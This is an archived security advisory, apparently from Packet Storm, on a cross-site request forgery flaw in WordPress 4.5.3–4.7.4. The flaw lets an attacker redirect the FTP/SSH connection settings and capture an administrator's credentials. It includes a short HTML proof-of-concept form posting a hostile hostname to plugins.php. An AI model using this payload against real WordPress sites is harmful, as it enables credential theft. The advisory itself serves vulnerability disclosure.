what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress Connection Information Cross Site Request Forgery

WordPress Connection Information Cross Site Request Forgery
Posted Apr 20, 2017
Authored by Yorick Koster, Securify B.V.

The FTP/SSH form functionality of WordPress was found to be vulnerable to cross site request forgery. WordPress versions 4.5.3 through 4.7.4 are affected.

tags | exploit, csrf
SHA-256 | b97c1f2af9252a37cfcaefbd0f9425ff1c4e40ba1332f9a406279cdaac8df4db

WordPress Connection Information Cross Site Request Forgery

Change Mirror Download
------------------------------------------------------------------------
Cross-Site Request Forgery in WordPress Connection Information
------------------------------------------------------------------------
Yorick Koster, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
The FTP/SSH form functionality of WordPress was found to be vulnerable
to Cross-Site Request Forgery. This vulnerability can be used to
overwrite the FTP or SSH connection settings of the affected WordPress
site. An attacker can use this issue to trick an Administrator into
logging into the attacker's FTP or SSH server, disclosing his/her login
credentials to the attacker. In order to exploit this vulnerability, the
attacker has to lure/force a logged on WordPress Administrator into
opening a malicious website.


------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160717-0004

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on the WordPress version 4.5.3 up
till and including version 4.7.4.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
There is currently no fix available.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_wordpress_connection_information.html

This issue exists in the method request_filesystem_credentials() (/wp-admin/includes/file.php). It allows overwriting of the values:

- hostname
- username
- connection_type

The request_filesystem_credentials() method is called in various locations in WordPress. The connection information is updated if a POST request contains a password or public & private key value (in case of connection type ssh). In order to trigger this issue, the WordPress installation must not be able to write to the wp-content folder. Also, the attacker has to lure/force a logged on WordPress Administrator into opening a malicious website.

Proof of concept

<html>
<body>
<form action="http://<target>/wp-admin/plugins.php" method="POST">
<input type="hidden" name="hostname" value="sumofpwn.nl" />
<input type="hidden" name="connection_type" value="ftp" />
<input type="hidden" name="password" value="password" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

------------------------------------------------------------------------
Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its
goal is to contribute to the security of popular, widely used OSS
projects in a fun and educational way.

Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    48 Files
  • 20
    Sep 20th
    36 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close